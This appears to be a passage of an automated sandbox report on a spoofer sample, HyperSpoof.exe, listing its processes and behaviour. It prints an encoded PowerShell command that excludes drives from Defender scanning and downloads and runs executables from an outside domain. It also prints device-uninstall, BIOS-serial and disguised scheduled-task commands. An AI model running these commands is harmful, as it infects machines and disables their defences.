N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A
N/A N/A C:\ChainReview\sphyperRuntimedhcpSvc.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeImpersonatePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeBackupPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeLoadDriverPrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A
Token: SeRestorePrivilege N/A C:\ProgramData\Microsoft\Windows\DevManView.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1688 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 1608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2592 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1932 wrote to memory of 2220 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\conhostsft.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1652 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 1652 wrote to memory of 2236 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\Volumeid64.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2592 wrote to memory of 584 N/A C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe C:\Windows\SysWOW64\WScript.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 2220 wrote to memory of 2212 N/A C:\Users\Admin\AppData\Roaming\conhostsft.exe C:\Users\Admin\AppData\Roaming\.conhostsft.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1608 wrote to memory of 1284 N/A C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe C:\Windows\System32\cmd.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2368 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2956 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2268 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2276 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 1684 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2892 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2320 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 576 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 572 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 3028 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe
PID 1284 wrote to memory of 2836 N/A C:\Windows\System32\cmd.exe C:\ProgramData\Microsoft\Windows\DevManView.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe

"C:\Users\Admin\AppData\Local\Temp\HyperSpoof.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeQB0ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaQB0AHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBjAHIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaQBrAGwAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwBjAGwALwBIAHAAcwByAFMAcABvAG8AZgAuAGUAeABlACcALAAgADwAIwByAHYAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGQAcwBzACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAdwB6ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEgAcABzAHIAUwBwAG8AbwBmAC4AZQB4AGUAJwApACkAPAAjAHYAegB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGIAbwBvAGsAcgBlAGEAZABpAG4AZwAyADAAMgA0AC4AbgBlAHQALwByAGUAbQBvAHQAZQAvAHMAcABoAHkAcABlAHIAUgB1AG4AdABpAG0AZQBkAGgAYwBwAFMAdgBjAC4AZQB4AGUAJwAsACAAPAAjAG4AZgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeQB3AGcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcQBnAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcwBwAGgAeQBwAGUAcgBSAHUAbgB0AGkAbQBlAGQAaABjAHAAUwB2AGMALgBlAHgAZQAnACkAKQA8ACMAdwBnAG0AIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBvAG8AawByAGUAYQBkAGkAbgBnADIAMAAyADQALgBuAGUAdAAvAG0ALwBjAG8AbgBoAG8AcwB0AHMAZgB0AC4AZQB4AGUAJwAsACAAPAAjAGcAYwB6ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagB2AHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABmAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAYwBvAG4AaABvAHMAdABzAGYAdAAuAGUAeABlACcAKQApADwAIwBnAHgAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAeQB3AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASABwAHMAcgBTAHAAbwBvAGYALgBlAHgAZQAnACkAPAAjAGgAaAB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAZgB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB3AGUAcAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBzAHAAaAB5AHAAZQByAFIAdQBuAHQAaQBtAGUAZABoAGMAcABTAHYAYwAuAGUAeABlACcAKQA8ACMAeAB2AGwAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZwBkAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAZQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGMAbwBuAGgAbwBzAHQAcwBmAHQALgBlAHgAZQAnACkAPAAjAGsAYwBwACMAPgA="

C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe

"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"

C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe

"C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"

C:\Users\Admin\AppData\Roaming\conhostsft.exe

"C:\Users\Admin\AppData\Roaming\conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB

C:\ProgramData\Microsoft\Windows\Volumeid64.exe

C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 570Z-GGZB

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ChainReview\4N7V2tIOe7KSQ8eET3YGuCyK2Y.vbe"

C:\Users\Admin\AppData\Roaming\.conhostsft.exe

"C:\Users\Admin\AppData\Roaming\.conhostsft.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""

C:\ProgramData\Microsoft\Windows\DevManView.exe

C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ChainReview\8xoM57ln5l3nWVEqwKA0TDOQ0Am35EOuQMtKP.bat" "

C:\ChainReview\sphyperRuntimedhcpSvc.exe

"C:\ChainReview/sphyperRuntimedhcpSvc.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 13721HP-TRGT24587AB

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Videos\explorer.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe

C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 213724HP-TRGT2567RV

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Videos\explorer.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Photo Viewer\fr-FR\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Program Files\Windows Defender\fr-FR\lsass.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\ChainReview\taskhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\ChainReview\taskhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

